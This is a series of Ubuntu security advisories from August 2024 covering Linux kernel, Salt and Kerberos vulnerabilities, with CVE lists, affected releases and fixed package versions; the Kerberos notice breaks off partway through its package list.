Ubuntu Security Notice 6950-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6950-1August 08, 2024linux, linux-aws, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop,linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-lowlatency,linux-lowlatency-hwe-5.15, linux-nvidia vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-intel-iotg: Linux kernel for Intel IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-nvidia: Linux kernel for NVIDIA systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-intel-iotg-5.15: Linux kernel for Intel IoT platforms- linux-lowlatency-hwe-5.15: Linux low latency kernelDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - Block layer subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - FireWire subsystem;   - GPU drivers;   - InfiniBand drivers;   - Multiple devices driver;   - EEPROM drivers;   - Network drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - 9P distributed file system;   - Network file system client;   - SMB network file system;   - Socket messages infrastructure;   - Dynamic debug library;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - NSH protocol;   - Phonet protocol;   - TIPC protocol;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;(CVE-2024-36883, CVE-2024-36940, CVE-2024-36902, CVE-2024-36975,CVE-2024-36964, CVE-2024-36938, CVE-2024-36931, CVE-2024-35848,CVE-2024-26900, CVE-2024-36967, CVE-2024-36904, CVE-2024-27398,CVE-2024-36031, CVE-2023-52585, CVE-2024-36886, CVE-2024-36937,CVE-2024-36954, CVE-2024-36916, CVE-2024-36905, CVE-2024-36959,CVE-2024-26980, CVE-2024-26936, CVE-2024-36928, CVE-2024-36889,CVE-2024-36929, CVE-2024-36933, CVE-2024-27399, CVE-2024-36946,CVE-2024-36906, CVE-2024-36965, CVE-2024-36957, CVE-2024-36941,CVE-2024-36897, CVE-2024-36952, CVE-2024-36947, CVE-2024-36950,CVE-2024-36880, CVE-2024-36017, CVE-2023-52882, CVE-2024-36969,CVE-2024-38600, CVE-2024-36955, CVE-2024-36960, CVE-2024-27401,CVE-2024-36919, CVE-2024-36934, CVE-2024-35947, CVE-2024-36953,CVE-2024-36944, CVE-2024-36939)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-5.15.0-1050-gkeop   5.15.0-1050.57   linux-image-5.15.0-1062-intel-iotg  5.15.0-1062.68   linux-image-5.15.0-1062-nvidia  5.15.0-1062.63   linux-image-5.15.0-1062-nvidia-lowlatency  5.15.0-1062.63   linux-image-5.15.0-1064-gke     5.15.0-1064.70   linux-image-5.15.0-1064-kvm     5.15.0-1064.69   linux-image-5.15.0-1066-gcp     5.15.0-1066.74   linux-image-5.15.0-1067-aws     5.15.0-1067.73   linux-image-5.15.0-118-generic  5.15.0-118.128   linux-image-5.15.0-118-generic-64k  5.15.0-118.128   linux-image-5.15.0-118-generic-lpae  5.15.0-118.128   linux-image-5.15.0-118-lowlatency  5.15.0-118.128   linux-image-5.15.0-118-lowlatency-64k  5.15.0-118.128   linux-image-aws-lts-22.04       5.15.0.1067.67   linux-image-gcp-lts-22.04       5.15.0.1066.62   linux-image-generic             5.15.0.118.118   linux-image-generic-64k         5.15.0.118.118   linux-image-generic-lpae        5.15.0.118.118   linux-image-gke                 5.15.0.1064.63   linux-image-gke-5.15            5.15.0.1064.63   linux-image-gkeop               5.15.0.1050.49   linux-image-gkeop-5.15          5.15.0.1050.49   linux-image-intel-iotg          5.15.0.1062.62   linux-image-kvm                 5.15.0.1064.60   linux-image-lowlatency          5.15.0.118.108   linux-image-lowlatency-64k      5.15.0.118.108   linux-image-nvidia              5.15.0.1062.62   linux-image-nvidia-lowlatency   5.15.0.1062.62   linux-image-virtual             5.15.0.118.118Ubuntu 20.04 LTS   linux-image-5.15.0-1062-intel-iotg  5.15.0-1062.68~20.04.1   linux-image-5.15.0-1066-gcp     5.15.0-1066.74~20.04.1   linux-image-5.15.0-118-lowlatency  5.15.0-118.128~20.04.1   linux-image-5.15.0-118-lowlatency-64k  5.15.0-118.128~20.04.1   linux-image-gcp                 5.15.0.1066.74~20.04.1   linux-image-intel               5.15.0.1062.68~20.04.1   linux-image-intel-iotg          5.15.0.1062.68~20.04.1   linux-image-lowlatency-64k-hwe-20.04  5.15.0.118.128~20.04.1   linux-image-lowlatency-hwe-20.04  5.15.0.118.128~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6950-1   CVE-2023-52585, CVE-2023-52882, CVE-2024-26900, CVE-2024-26936,   CVE-2024-26980, CVE-2024-27398, CVE-2024-27399, CVE-2024-27401,   CVE-2024-35848, CVE-2024-35947, CVE-2024-36017, CVE-2024-36031,   CVE-2024-36880, CVE-2024-36883, CVE-2024-36886, CVE-2024-36889,   CVE-2024-36897, CVE-2024-36902, CVE-2024-36904, CVE-2024-36905,   CVE-2024-36906, CVE-2024-36916, CVE-2024-36919, CVE-2024-36928,   CVE-2024-36929, CVE-2024-36931, CVE-2024-36933, CVE-2024-36934,   CVE-2024-36937, CVE-2024-36938, CVE-2024-36939, CVE-2024-36940,   CVE-2024-36941, CVE-2024-36944, CVE-2024-36946, CVE-2024-36947,   CVE-2024-36950, CVE-2024-36952, CVE-2024-36953, CVE-2024-36954,   CVE-2024-36955, CVE-2024-36957, CVE-2024-36959, CVE-2024-36960,   CVE-2024-36964, CVE-2024-36965, CVE-2024-36967, CVE-2024-36969,   CVE-2024-36975, CVE-2024-38600Package Information:   https://launchpad.net/ubuntu/+source/linux/5.15.0-118.128   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1067.73   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1066.74   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1064.70   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1050.57   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1062.68   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1064.69   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-118.128   https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1062.63   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1066.74~20.04.1  https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1062.68~20.04.1  https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-118.128~20.04.1

Ubuntu Security Notice USN-6950-1

Ubuntu Security Notice 6949-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6949-1August 08, 2024linux, linux-aws, linux-gcp, linux-gke, linux-ibm, linux-nvidia,linux-nvidia-6.8, linux-oem-6.8 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-nvidia: Linux kernel for NVIDIA systems- linux-oem-6.8: Linux kernel for OEM systems- linux-nvidia-6.8: Linux kernel for NVIDIA systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - M68K architecture;   - OpenRISC architecture;   - PowerPC architecture;   - RISC-V architecture;   - x86 architecture;   - Block layer subsystem;   - Accessibility subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Hardware crypto device drivers;   - DMA engine subsystem;   - DPLL subsystem;   - FireWire subsystem;   - EFI core;   - Qualcomm firmware drivers;   - GPIO subsystem;   - GPU drivers;   - Microsoft Hyper-V drivers;   - InfiniBand drivers;   - IOMMU subsystem;   - IRQ chip drivers;   - Macintosh device drivers;   - Multiple devices driver;   - Media drivers;   - EEPROM drivers;   - MMC subsystem;   - Network drivers;   - STMicroelectronics network drivers;   - Device tree and open firmware driver;   - HiSilicon SoC PMU drivers;   - PHY drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - SPI subsystem;   - Media staging drivers;   - Thermal drivers;   - Userspace I/O drivers;   - USB subsystem;   - DesignWare USB3 driver;   - ACRN Hypervisor Service Module driver;   - Virtio drivers;   - 9P distributed file system;   - BTRFS file system;   - eCrypt file system;   - EROFS file system;   - File systems infrastructure;   - GFS2 file system;   - JFFS2 file system;   - Network file systems library;   - Network file system client;   - Network file system server daemon;   - NILFS2 file system;   - Proc file system;   - SMB network file system;   - Tracing file system;   - Mellanox drivers;   - Memory management;   - Socket messages infrastructure;   - Slab allocator;   - Tracing infrastructure;   - User-space API (UAPI);   - Core kernel;   - BPF subsystem;   - DMA mapping infrastructure;   - RCU subsystem;   - Dynamic debug library;   - KUnit library;   - Maple Tree data structure library;   - Heterogeneous memory management;   - Amateur Radio drivers;   - Bluetooth subsystem;   - Ethernet bridge;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - Netfilter;   - NET/ROM layer;   - NFC subsystem;   - NSH protocol;   - Open vSwitch;   - Phonet protocol;   - SMC sockets;   - TIPC protocol;   - Unix domain sockets;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;   - Kirkwood ASoC drivers;   - MediaTek ASoC drivers;(CVE-2024-36006, CVE-2024-36922, CVE-2024-38567, CVE-2024-38584,CVE-2024-36923, CVE-2024-36892, CVE-2024-35855, CVE-2024-35853,CVE-2024-38562, CVE-2024-36920, CVE-2024-38543, CVE-2024-38576,CVE-2024-38572, CVE-2024-36898, CVE-2024-38560, CVE-2024-36004,CVE-2024-36956, CVE-2024-36881, CVE-2024-36977, CVE-2024-36955,CVE-2024-36906, CVE-2024-36013, CVE-2024-36884, CVE-2024-38563,CVE-2024-36966, CVE-2024-38547, CVE-2024-38594, CVE-2024-36926,CVE-2024-38587, CVE-2024-38566, CVE-2024-27400, CVE-2024-36941,CVE-2024-36017, CVE-2024-38544, CVE-2024-36899, CVE-2024-35851,CVE-2024-38577, CVE-2024-38590, CVE-2024-38568, CVE-2024-38559,CVE-2024-38611, CVE-2024-36887, CVE-2024-36886, CVE-2024-35996,CVE-2024-38612, CVE-2024-36925, CVE-2024-38586, CVE-2024-38596,CVE-2024-36932, CVE-2024-39482, CVE-2024-38585, CVE-2024-36033,CVE-2024-38614, CVE-2024-35852, CVE-2024-36908, CVE-2024-36939,CVE-2024-36963, CVE-2024-27401, CVE-2024-36029, CVE-2024-38540,CVE-2024-38565, CVE-2024-36927, CVE-2024-36910, CVE-2024-42134,CVE-2024-36888, CVE-2024-35859, CVE-2024-36911, CVE-2024-35947,CVE-2024-36940, CVE-2024-36921, CVE-2024-36913, CVE-2024-36943,CVE-2024-35986, CVE-2024-38616, CVE-2024-36900, CVE-2024-36954,CVE-2024-36915, CVE-2024-38602, CVE-2024-41011, CVE-2024-35991,CVE-2024-36909, CVE-2024-38603, CVE-2023-52882, CVE-2024-36953,CVE-2024-38599, CVE-2024-38574, CVE-2024-36967, CVE-2024-36895,CVE-2024-36003, CVE-2024-36961, CVE-2024-38545, CVE-2024-38538,CVE-2024-36001, CVE-2024-36912, CVE-2024-36952, CVE-2024-38550,CVE-2024-38570, CVE-2024-36969, CVE-2024-38595, CVE-2024-35849,CVE-2024-36936, CVE-2024-35949, CVE-2024-36009, CVE-2024-35987,CVE-2024-38541, CVE-2024-38564, CVE-2024-36032, CVE-2024-38615,CVE-2024-36960, CVE-2024-36934, CVE-2024-36951, CVE-2024-35999,CVE-2024-38551, CVE-2024-36903, CVE-2024-36931, CVE-2024-38593,CVE-2024-36938, CVE-2024-38607, CVE-2024-36928, CVE-2024-38552,CVE-2024-36002, CVE-2024-38605, CVE-2024-38582, CVE-2024-36933,CVE-2024-38620, CVE-2024-27395, CVE-2024-27396, CVE-2024-36012,CVE-2024-38591, CVE-2024-38597, CVE-2024-36889, CVE-2024-36964,CVE-2024-38606, CVE-2024-38553, CVE-2024-36945, CVE-2024-35848,CVE-2024-36962, CVE-2024-36947, CVE-2024-27399, CVE-2024-38546,CVE-2024-38583, CVE-2024-38573, CVE-2024-35850, CVE-2024-38549,CVE-2024-38588, CVE-2024-38610, CVE-2024-36917, CVE-2024-36957,CVE-2024-35846, CVE-2024-38579, CVE-2024-36965, CVE-2024-35857,CVE-2024-38548, CVE-2024-36975, CVE-2024-36919, CVE-2024-38542,CVE-2024-36948, CVE-2024-36011, CVE-2024-38556, CVE-2024-36897,CVE-2024-38557, CVE-2024-36890, CVE-2024-36882, CVE-2024-38613,CVE-2024-36914, CVE-2024-35998, CVE-2024-36958, CVE-2024-38580,CVE-2024-36896, CVE-2024-36891, CVE-2024-36924, CVE-2024-38589,CVE-2024-38592, CVE-2024-36904, CVE-2024-36894, CVE-2024-36028,CVE-2024-36014, CVE-2024-36880, CVE-2024-36944, CVE-2024-38598,CVE-2024-36929, CVE-2024-36883, CVE-2024-35858, CVE-2024-38555,CVE-2024-36005, CVE-2024-38539, CVE-2024-35994, CVE-2024-36030,CVE-2024-27394, CVE-2024-36930, CVE-2024-36937, CVE-2024-38561,CVE-2024-38578, CVE-2024-36959, CVE-2024-36935, CVE-2024-36916,CVE-2024-36902, CVE-2024-38604, CVE-2024-38554, CVE-2024-38575,CVE-2024-36918, CVE-2024-36979, CVE-2024-35854, CVE-2024-36968,CVE-2024-38558, CVE-2024-36000, CVE-2024-27398, CVE-2024-35983,CVE-2024-36949, CVE-2024-38600, CVE-2024-36950, CVE-2024-36946,CVE-2024-36031, CVE-2024-35847, CVE-2024-36905, CVE-2024-38571,CVE-2024-36007, CVE-2024-35856, CVE-2024-38601, CVE-2024-38569,CVE-2024-38617, CVE-2024-35988, CVE-2024-35989, CVE-2024-35993,CVE-2024-36893, CVE-2024-36901)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   linux-image-6.8.0-1008-gke      6.8.0-1008.11   linux-image-6.8.0-1010-ibm      6.8.0-1010.10   linux-image-6.8.0-1010-oem      6.8.0-1010.10   linux-image-6.8.0-1011-nvidia   6.8.0-1011.11   linux-image-6.8.0-1011-nvidia-64k  6.8.0-1011.11   linux-image-6.8.0-1012-gcp      6.8.0-1012.13   linux-image-6.8.0-1013-aws      6.8.0-1013.14   linux-image-6.8.0-40-generic    6.8.0-40.40   linux-image-6.8.0-40-generic-64k  6.8.0-40.40   linux-image-aws                 6.8.0-1013.14   linux-image-gcp                 6.8.0-1012.13   linux-image-generic             6.8.0-40.40   linux-image-generic-64k         6.8.0-40.40   linux-image-generic-64k-hwe-24.04  6.8.0-40.40   linux-image-generic-hwe-24.04   6.8.0-40.40   linux-image-generic-lpae        6.8.0-40.40   linux-image-gke                 6.8.0-1008.11   linux-image-ibm                 6.8.0-1010.10   linux-image-ibm-classic         6.8.0-1010.10   linux-image-ibm-lts-24.04       6.8.0-1010.10   linux-image-kvm                 6.8.0-40.40   linux-image-nvidia              6.8.0-1011.11   linux-image-nvidia-64k          6.8.0-1011.11   linux-image-oem-24.04           6.8.0-1010.10   linux-image-oem-24.04a          6.8.0-1010.10   linux-image-virtual             6.8.0-40.40   linux-image-virtual-hwe-24.04   6.8.0-40.40Ubuntu 22.04 LTS   linux-image-6.8.0-1011-nvidia   6.8.0-1011.11~22.04.1   linux-image-6.8.0-1011-nvidia-64k  6.8.0-1011.11~22.04.1   linux-image-nvidia-6.8          6.8.0-1011.11~22.04.1   linux-image-nvidia-64k-6.8      6.8.0-1011.11~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6949-1   CVE-2023-52882, CVE-2024-27394, CVE-2024-27395, CVE-2024-27396,   CVE-2024-27398, CVE-2024-27399, CVE-2024-27400, CVE-2024-27401,   CVE-2024-35846, CVE-2024-35847, CVE-2024-35848, CVE-2024-35849,   CVE-2024-35850, CVE-2024-35851, CVE-2024-35852, CVE-2024-35853,   CVE-2024-35854, CVE-2024-35855, CVE-2024-35856, CVE-2024-35857,   CVE-2024-35858, CVE-2024-35859, CVE-2024-35947, CVE-2024-35949,   CVE-2024-35983, CVE-2024-35986, CVE-2024-35987, CVE-2024-35988,   CVE-2024-35989, CVE-2024-35991, CVE-2024-35993, CVE-2024-35994,   CVE-2024-35996, CVE-2024-35998, CVE-2024-35999, CVE-2024-36000,   CVE-2024-36001, CVE-2024-36002, CVE-2024-36003, CVE-2024-36004,   CVE-2024-36005, CVE-2024-36006, CVE-2024-36007, CVE-2024-36009,   CVE-2024-36011, CVE-2024-36012, CVE-2024-36013, CVE-2024-36014,   CVE-2024-36017, CVE-2024-36028, CVE-2024-36029, CVE-2024-36030,   CVE-2024-36031, CVE-2024-36032, CVE-2024-36033, CVE-2024-36880,   CVE-2024-36881, CVE-2024-36882, CVE-2024-36883, CVE-2024-36884,   CVE-2024-36886, CVE-2024-36887, CVE-2024-36888, CVE-2024-36889,   CVE-2024-36890, CVE-2024-36891, CVE-2024-36892, CVE-2024-36893,   CVE-2024-36894, CVE-2024-36895, CVE-2024-36896, CVE-2024-36897,   CVE-2024-36898, CVE-2024-36899, CVE-2024-36900, CVE-2024-36901,   CVE-2024-36902, CVE-2024-36903, CVE-2024-36904, CVE-2024-36905,   CVE-2024-36906, CVE-2024-36908, CVE-2024-36909, CVE-2024-36910,   CVE-2024-36911, CVE-2024-36912, CVE-2024-36913, CVE-2024-36914,   CVE-2024-36915, CVE-2024-36916, CVE-2024-36917, CVE-2024-36918,   CVE-2024-36919, CVE-2024-36920, CVE-2024-36921, CVE-2024-36922,   CVE-2024-36923, CVE-2024-36924, CVE-2024-36925, CVE-2024-36926,   CVE-2024-36927, CVE-2024-36928, CVE-2024-36929, CVE-2024-36930,   CVE-2024-36931, CVE-2024-36932, CVE-2024-36933, CVE-2024-36934,   CVE-2024-36935, CVE-2024-36936, CVE-2024-36937, CVE-2024-36938,   CVE-2024-36939, CVE-2024-36940, CVE-2024-36941, CVE-2024-36943,   CVE-2024-36944, CVE-2024-36945, CVE-2024-36946, CVE-2024-36947,   CVE-2024-36948, CVE-2024-36949, CVE-2024-36950, CVE-2024-36951,   CVE-2024-36952, CVE-2024-36953, CVE-2024-36954, CVE-2024-36955,   CVE-2024-36956, CVE-2024-36957, CVE-2024-36958, CVE-2024-36959,   CVE-2024-36960, CVE-2024-36961, CVE-2024-36962, CVE-2024-36963,   CVE-2024-36964, CVE-2024-36965, CVE-2024-36966, CVE-2024-36967,   CVE-2024-36968, CVE-2024-36969, CVE-2024-36975, CVE-2024-36977,   CVE-2024-36979, CVE-2024-38538, CVE-2024-38539, CVE-2024-38540,   CVE-2024-38541, CVE-2024-38542, CVE-2024-38543, CVE-2024-38544,   CVE-2024-38545, CVE-2024-38546, CVE-2024-38547, CVE-2024-38548,   CVE-2024-38549, CVE-2024-38550, CVE-2024-38551, CVE-2024-38552,   CVE-2024-38553, CVE-2024-38554, CVE-2024-38555, CVE-2024-38556,   CVE-2024-38557, CVE-2024-38558, CVE-2024-38559, CVE-2024-38560,   CVE-2024-38561, CVE-2024-38562, CVE-2024-38563, CVE-2024-38564,   CVE-2024-38565, CVE-2024-38566, CVE-2024-38567, CVE-2024-38568,   CVE-2024-38569, CVE-2024-38570, CVE-2024-38571, CVE-2024-38572,   CVE-2024-38573, CVE-2024-38574, CVE-2024-38575, CVE-2024-38576,   CVE-2024-38577, CVE-2024-38578, CVE-2024-38579, CVE-2024-38580,   CVE-2024-38582, CVE-2024-38583, CVE-2024-38584, CVE-2024-38585,   CVE-2024-38586, CVE-2024-38587, CVE-2024-38588, CVE-2024-38589,   CVE-2024-38590, CVE-2024-38591, CVE-2024-38592, CVE-2024-38593,   CVE-2024-38594, CVE-2024-38595, CVE-2024-38596, CVE-2024-38597,   CVE-2024-38598, CVE-2024-38599, CVE-2024-38600, CVE-2024-38601,   CVE-2024-38602, CVE-2024-38603, CVE-2024-38604, CVE-2024-38605,   CVE-2024-38606, CVE-2024-38607, CVE-2024-38610, CVE-2024-38611,   CVE-2024-38612, CVE-2024-38613, CVE-2024-38614, CVE-2024-38615,   CVE-2024-38616, CVE-2024-38617, CVE-2024-38620, CVE-2024-39482,   CVE-2024-41011, CVE-2024-42134Package Information:   https://launchpad.net/ubuntu/+source/linux/6.8.0-40.40   https://launchpad.net/ubuntu/+source/linux-aws/6.8.0-1013.14   https://launchpad.net/ubuntu/+source/linux-gcp/6.8.0-1012.13   https://launchpad.net/ubuntu/+source/linux-gke/6.8.0-1008.11   https://launchpad.net/ubuntu/+source/linux-ibm/6.8.0-1010.10   https://launchpad.net/ubuntu/+source/linux-nvidia/6.8.0-1011.11   https://launchpad.net/ubuntu/+source/linux-oem-6.8/6.8.0-1010.10   https://launchpad.net/ubuntu/+source/linux-nvidia-6.8/6.8.0-1011.11~22.04.1

Ubuntu Security Notice USN-6949-1

Ubuntu Security Notice 6948-1 - It was discovered that Salt incorrectly handled crafted web requests. A remote attacker could possibly use this issue to run arbitrary commands. It was discovered that Salt incorrectly created certificates with weak file permissions. It was discovered that Salt incorrectly handled credential validation. A remote attacker could possibly use this issue to bypass authentication.

==========================================================================  
Ubuntu Security Notice USN-6948-1  
August 08, 2024

salt vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in Salt.

Software Description:  
- salt: Infrastructure management built on a dynamic communication bus

Details:

It was discovered that Salt incorrectly handled crafted web requests.  
A remote attacker could possibly use this issue to run arbitrary  
commands. (CVE-2020-16846)

It was discovered that Salt incorrectly created certificates with weak  
file permissions. (CVE-2020-17490)

It was discovered that Salt incorrectly handled credential validation.  
A remote attacker could possibly use this issue to bypass authentication.  
(CVE-2020-25592)

It was discovered that Salt incorrectly handled crafted process names.  
An attacker could possibly use this issue to run arbitrary commands.  
This issue only affected Ubuntu 18.04 LTS. (CVE-2020-28243)

It was discovered that Salt incorrectly handled validation of SSL/TLS  
certificates. A remote attacker could possibly use this issue to spoof  
a trusted entity. (CVE-2020-28972, CVE-2020-35662)

It was discovered that Salt incorrectly handled credential validation.  
A remote attacker could possibly use this issue to run arbitrary code.  
(CVE-2021-25281)

It was discovered that Salt incorrectly handled crafted paths. A remote  
attacker could possibly use this issue to perform directory traversal.  
(CVE-2021-25282)

It was discovered that Salt incorrectly handled template rendering. A  
remote attacker could possibly this issue to run arbitrary code.  
(CVE-2021-25283)

It was discovered that Salt incorrectly handled logging. An attacker  
could possibly use this issue to discover credentials. This issue only  
affected Ubuntu 18.04 LTS. (CVE-2021-25284)

It was discovered that Salt incorrectly handled crafted web requests.  
A remote attacker could possibly use this issue to run arbitrary  
commands. This issue only affected Ubuntu 18.04 LTS. (CVE-2021-3148)

It was discovered that Salt incorrectly handled input sanitization.  
A remote attacker could possibly use this issue to run arbitrary  
commands. (CVE-2021-3197)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS  
   salt-common                     2017.7.4+dfsg1-1ubuntu18.04.2+esm1  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   salt-common                     2015.8.8+ds-1ubuntu0.1+esm2  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6948-1  
   CVE-2020-16846, CVE-2020-17490, CVE-2020-25592, CVE-2020-28243,  
   CVE-2020-28972, CVE-2020-35662, CVE-2021-25281, CVE-2021-25282,  
   CVE-2021-25283, CVE-2021-25284, CVE-2021-3148, CVE-2021-3197

Ubuntu Security Notice USN-6948-1

Ubuntu Security Notice 6947-1 - It was discovered that Kerberos incorrectly handled GSS message tokens where an unwrapped token could appear to be truncated. An attacker could possibly use this issue to cause a denial of service. It was discovered that Kerberos incorrectly handled GSS message tokens when sent a token with invalid length fields. An attacker could possibly use this issue to cause a denial of service.

==========================================================================

Ubuntu Security Notice USN-6947-1  
August 08, 2024

krb5 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

Kerberos could be made to crash if it received specially crafted  
input.

Software Description:  
- krb5: MIT Kerberos Network Authentication Protocol

Details:

It was discovered that Kerberos incorrectly handled GSS message tokens  
where an unwrapped token could appear to be truncated. An attacker  
could possibly use this issue to cause a denial of service.  
(CVE-2024-37370)

It was discovered that Kerberos incorrectly handled GSS message tokens  
when sent a token with invalid length fields. An attacker could possibly  
use this issue to cause a denial of service. (CVE-2024-37371)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   krb5-admin-server               1.20.1-6ubuntu2.1  
   krb5-kdc                        1.20.1-6ubuntu2.1  
   krb5-kdc-ldap                   1.20.1-6ubuntu2.1  
   krb5-otp                        1.20.1-6ubuntu2.1  
   krb5-pkinit                     1.20.1-6ubuntu2.1  
   krb5-user                       1.20.1-6ubuntu2.1  
   libgssapi-krb5-2                1.20.1-6ubuntu2.1  
   libgssrpc4t64                   1.20.1-6ubuntu2.1  
   libk5crypto3                    1.20.1-6ubuntu2.1  
   libkadm5clnt-mit12              1.20.1-6ubuntu2.1  
   libkadm5srv-mit12               1.20.1-6ubuntu2.1  
   libkdb5-10t64                   1.20.1-6ubuntu2.1  
   libkrad0                        1.20.1-6ubuntu2.1  
   libkrb5-3                       1.20.1-6ubuntu2.1  
   libkrb5support0                 1.20.1-6ubuntu2.1

Ubuntu 22.04 LTS  
   krb5-admin-server               1.19.2-2ubuntu0.4  
   krb5-kdc                        1.19.2-2ubuntu0.4  
   krb5-kdc-ldap                   1.19.2-2ubuntu0.4  
   krb5-otp                        1.19.2-2ubuntu0.4  
   krb5-pkinit                     1.19.2-2ubuntu0.4  
   krb5-user                       1.19.2-2ubuntu0.4  
   libgssapi-krb5-2                1.19.2-2ubuntu0.4  
   libgssrpc4                      1.19.2-2ubuntu0.4  
   libk5crypto3                    1.19.2-2ubuntu0.4  
   libkadm5clnt-mit12              1.19.2-2ubuntu0.4  
   libkadm5srv-mit12               1.19.2-2ubuntu0.4  
   libkdb5-10                      1.19.2-2ubuntu0.4  
   libkrad0                        1.19.2-2ubuntu0.4  
   libkrb5-3                       1.19.2-2ubuntu0.4  
   libkrb5support0                 1.19.2-2ubuntu0.4

Ubuntu 20.04 LTS  
   krb5-admin-server               1.17-6ubuntu4.6  
   krb5-kdc                        1.17-6ubuntu4.6  
   krb5-kdc-ldap                   1.17-6ubuntu4.6  
   krb5-otp                        1.17-6ubuntu4.6  
   krb5-pkinit                     1.17-6ubuntu4.6  
   krb5-user                       1.17-6ubuntu4.6  
   libgssapi-krb5-2                1.17-6ubuntu4.6  
   libgssrpc4                      1.17-6ubuntu4.6  
   libk5crypto3                    1.17-6ubuntu4.6  
   libkadm5clnt-mit11              1.17-6ubuntu4.6  
   libkadm5srv-mit11               1.17-6ubuntu4.6  
   libkdb5-9                       1.17-6ubuntu4.6  
   libkrad0                        1.17-6ubuntu4.6  
   libkrb5-3                       1.17-6ubuntu4.6  
   libkrb5support0                 1.17-6ubuntu4.6

Ubuntu 18.04 LTS  
   krb5-admin-server               1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-kdc                        1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-kdc-ldap                   1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-otp                        1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-pkinit                     1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   krb5-user                       1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libgssapi-krb5-2                1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libgssrpc4                      1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libk5crypto3                    1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkadm5clnt-mit11              1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
